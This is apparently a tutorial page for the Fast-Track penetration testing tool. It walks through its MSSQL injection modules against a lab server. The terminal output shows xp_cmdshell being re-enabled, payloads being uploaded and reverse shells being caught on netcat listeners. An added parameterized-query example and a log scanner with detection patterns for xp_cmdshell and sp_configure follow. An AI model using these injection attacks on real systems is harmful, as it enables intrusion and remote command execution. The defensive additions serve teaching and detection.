Fast-Track Main Menu:
Fast-Track - Where it's OK to finish in under 3 minutes...
Version: v4.0
Written by: David Kennedy (ReL1K)
http://www.securestate.com
http://www.thepentest.com
1. Fast-Track Updates
2. Autopwn Automation
3. Microsoft SQL Tools
4. Mass Client-Side Attack
5. Exploits
6. Binary to Hex Payload Converter
7. Payload Generator
8. Fast-Track Tutorials
9. Fast-Track Changelog
10. Fast-Track Credits
11. Exit
Enter the number: 3
Microsoft SQL Attack Tools
Pick a list of the tools from below:
1. MSSQL Injector
2. MSSQL Bruter
3. SQLPwnage
Enter your choice : 1
Enter which SQL Injector you want to use
1. SQL Injector - Query String Parameter Attack
2. SQL Injector - POST Parameter Attack
3. SQL Injector - GET FTP Payload Attack
4. SQL Injector - GET Manual Setup Binary Payload Attack
Enter your choice:
Notice the different sub-menus that are available. We'll walk through each one and explain its purpose. The 'SQL Injector - Query String Parameter Attack' specifically targets vulnerable query string parameters within a website. Query strings are represented as follows: ?querystring1=value1&querystring2=value2 and injection often occurs where value1 and value2 are located. Let's browse to a vulnerable site:
Note the query string parameters on top: login and password. Let's throw a single quote in the 'login' query string parameter.
Now that we know that the login field is susceptible to SQL Injection, we need to tell Fast-Track where to launch the attack. We do this by specifying 'INJECTHERE in place of the injectable parameter in the query string, which tells Fast-Track what we want to attack. Look at the output below and the ultimate result.
Enter which SQL Injector you want to use
1. SQL Injector - Query String Parameter Attack
2. SQL Injector - POST Parameter Attack
3. SQL Injector - GET FTP Payload Attack
4. SQL Injector - GET Manual Setup Binary Payload Attack
Enter your choice: 1
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Requirements: PExpect
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This module uses a reverse shell by using the binary2hex method for uploading.
It does not require FTP or any other service, instead we are using the debug
function in Windows to generate the executable.
You will need to designate where in the URL the SQL Injection is by using 'INJECTHERE
So for example, when the tool asks you for the SQL Injectable URL, type:
http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah
Enter the URL of the susceptible site, remember to put 'INJECTHERE for the injectible parameter
Example:http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah
Enter here: http://10.211.55.128/Default.aspx?login='INJECTHERE&password=blah
Sending initial request to enable xp_cmdshell if disabled....
Sending first portion of payload (1/4)....
Sending second portion of payload (2/4)....
Sending third portion of payload (3/4)...
Sending the last portion of the payload (4/4)...
Running cleanup before executing the payload...
Running the payload on the server...Sending initial request to enable xp_cmdshell if disabled....
Sending first portion of payload (1/4)....
Sending second portion of payload (2/4)....
Sending third portion of payload (3/4)...
Sending the last portion of the payload (4/4)...
Running cleanup before executing the payload...
Running the payload on the server...
listening on [any] 4444 ...
connect to [10.211.55.130] from (UNKNOWN) [10.211.55.128] 1041
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>
Fast-Track automatically re-enables the 'xp_cmdshell' stored procedure if it is disabled and delivers a reverse payload to the system, ultimately giving us full access all through SQL Injection!
This was a great example of how to attack query string parameters, but what about forms? POST parameters can also be handled through Fast-Track, and very easily at that. In the Fast-Track 'MSSQL Injector' menu, select 'SQL Injector - POST Parameter Attack'.
Enter which SQL Injector you want to use
1. SQL Injector - Query String Parameter Attack
2. SQL Injector - POST Parameter Attack
3. SQL Injector - GET FTP Payload Attack
4. SQL Injector - GET Manual Setup Binary Payload Attack
Enter your choice: 2
This portion allows you to attack all forms on a specific website without having to specify
each parameter. Just type the URL in, and Fast-Track will auto SQL inject to each parameter
looking for both error based injection as well as blind based SQL injection. Simply type
the website you want to attack, and let it roll.
Example: http://www.sqlinjectablesite.com/index.aspx
Enter the URL to attack: http://10.211.55.128/Default.aspx
Forms detected...attacking the parameters in hopes of exploiting SQL Injection..
Sending payload to parameter: txtLogin
Sending payload to parameter: txtPassword
[-] The PAYLOAD is being delivered. This can take up to two minutes. [-]
listening on [any] 4444 ...
connect to [10.211.55.130] from (UNKNOWN) [10.211.55.128] 1041
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>
Not to quote Office Max, but that was easy! Fast-Track automatically detects the forms and attacks the system for SQL Injection, ultimately giving you access to the box.
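Both the query string attack and the form attack work because the value of login or password ends up inside the SQL text itself. The following is an added example, not code from the original page or from Fast-Track: it shows the same single-quote probe against a concatenated query and against a bound-parameter query. The table, the function names and the use of Python's sqlite3 module as a stand-in for MSSQL are assumptions made for illustration.

```python
import sqlite3

def make_db():
    # Constructed sample data; sqlite3 stands in for the MSSQL back end.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (login TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    return db

def login_concat(db, login, password):
    """Vulnerable: the parameter values become part of the SQL text."""
    sql = ("SELECT login FROM users WHERE login = '" + login +
           "' AND password = '" + password + "'")
    try:
        return db.execute(sql).fetchall()
    except sqlite3.OperationalError as exc:
        # A stray quote unbalances the statement; this is the error
        # the single-quote probe provokes on the vulnerable page.
        return f"SQL error: {exc}"

def login_bound(db, login, password):
    """Hardened: values are bound as data and never parsed as SQL."""
    sql = "SELECT login FROM users WHERE login = ? AND password = ?"
    return db.execute(sql, (login, password)).fetchall()

if __name__ == "__main__":
    db = make_db()
    print(login_concat(db, "'", "blah"))   # database error leaks to the caller
    print(login_bound(db, "'", "blah"))    # quote is just an unknown login
    print(login_bound(db, "alice", "s3cret"))
```

On an ASP.NET page backed by SQL Server the equivalent fix is a SqlCommand with SqlParameter values instead of string concatenation, applied to every form field and query string parameter.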
If for some reason the query string parameter attack was unsuccessful, you can use the 'SQL Injector - GET FTP Payload Attack'. This requires that you install ProFTPD, and is rarely used. This module will set up a payload through FTP echo files and ultimately deliver the payload through FTP and SQL Injection.
The 'SQL Injector - GET Manual Setup Binary Payload Attack' can be used if you're attacking from one machine but have a listener on another machine. This is often used if you're NATed and you have a listener box set up on the internet and not on the system you're attacking from.
Enter which SQL Injector you want to use
1. SQL Injector - Query String Parameter Attack
2. SQL Injector - POST Parameter Attack
3. SQL Injector - GET FTP Payload Attack
4. SQL Injector - GET Manual Setup Binary Payload Attack
Enter your choice: 4
The manual portion allows you to customize your attack for whatever reason.
You will need to designate where in the URL the SQL Injection is by using 'INJECTHERE
So for example, when the tool asks you for the SQL Injectable URL, type:
http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah
Enter the URL of the susceptible site, remember to put 'INJECTHERE for the injectible parameter
Example: http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah
Enter here: http://10.211.55.128/Default.aspx?login='INJECTHERE&password=blah
Enter the IP Address of server with NetCat Listening: 10.211.55.130
Enter Port number with NetCat listening: 9090
Sending initial request to enable xp_cmdshell if disabled....
Sending first portion of payload....
Sending second portion of payload....
Sending next portion of payload...
Sending the last portion of the payload...
Running cleanup...
Running the payload on the server...
listening on [any] 9090 ...
10.211.55.128: inverse host lookup failed: Unknown server error : Connection timed out
connect to [10.211.55.130] from (UNKNOWN) [10.211.55.128] 1045
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>
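The GET-based modules above place the injection in the query string, which the web server writes to its access log. The following is an added example, not part of the original page or of Fast-Track: a small log scanner that flags the single-quote probe and the xp_cmdshell re-enable step. The log layout, the rule names and the sample lines are constructed assumptions (the sample requests are not Fast-Track's actual traffic), and sp_configure is included because it is the procedure used to enable xp_cmdshell on SQL Server 2005 and later.

```python
import re
from urllib.parse import unquote_plus

# Detection rules, applied to the URL-decoded query string.
RULES = {
    "quote_in_param": re.compile(r"=[^&]*'"),
    "xp_cmdshell": re.compile(r"\bxp_cmdshell\b", re.I),
    "sp_configure": re.compile(r"\bsp_configure\b", re.I),
}

# Constructed sample lines: date time c-ip method uri-stem uri-query status
SAMPLE_LOG = """\
2010-01-01 10:00:01 10.211.55.130 GET /Default.aspx login=bob&password=blah 200
2010-01-01 10:00:09 10.211.55.130 GET /Default.aspx login=%27&password=blah 500
2010-01-01 10:00:30 10.211.55.130 GET /Default.aspx login=%27;exec+sp_configure+REDACTED--&password=blah 200
2010-01-01 10:00:31 10.211.55.130 GET /Default.aspx login=%27;exec+master..xp_cmdshell+REDACTED--&password=blah 200
2010-01-01 10:00:40 10.211.55.7 GET /Default.aspx login=o%27brien&password=x 200
"""

def parse_line(line):
    date, time, c_ip, method, stem, query, status = line.split()
    return {"ts": f"{date} {time}", "ip": c_ip, "stem": stem,
            "query": unquote_plus(query), "status": int(status)}

def scan(lines):
    """Return {client_ip: [(timestamp, severity, matched_rules), ...]}."""
    findings = {}
    for line in lines:
        if not line.strip() or line.startswith("#"):
            continue  # skip blanks and W3C header lines
        rec = parse_line(line)
        hits = [name for name, rx in RULES.items() if rx.search(rec["query"])]
        if not hits:
            continue
        if "xp_cmdshell" in hits or "sp_configure" in hits:
            sev = "critical"      # command execution being enabled or used
        elif rec["status"] >= 500:
            sev = "error-probe"   # quote that broke the query
        else:
            sev = "review"        # quote served normally, e.g. a surname
        findings.setdefault(rec["ip"], []).append((rec["ts"], sev, hits))
    return findings

if __name__ == "__main__":
    for ip, events in scan(SAMPLE_LOG.splitlines()).items():
        print(ip, events)
```

IIS does not log POST bodies by default, so the POST Parameter Attack will not show these tokens in the access log; that variant needs request-body inspection at a WAF or auditing on the SQL Server side.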


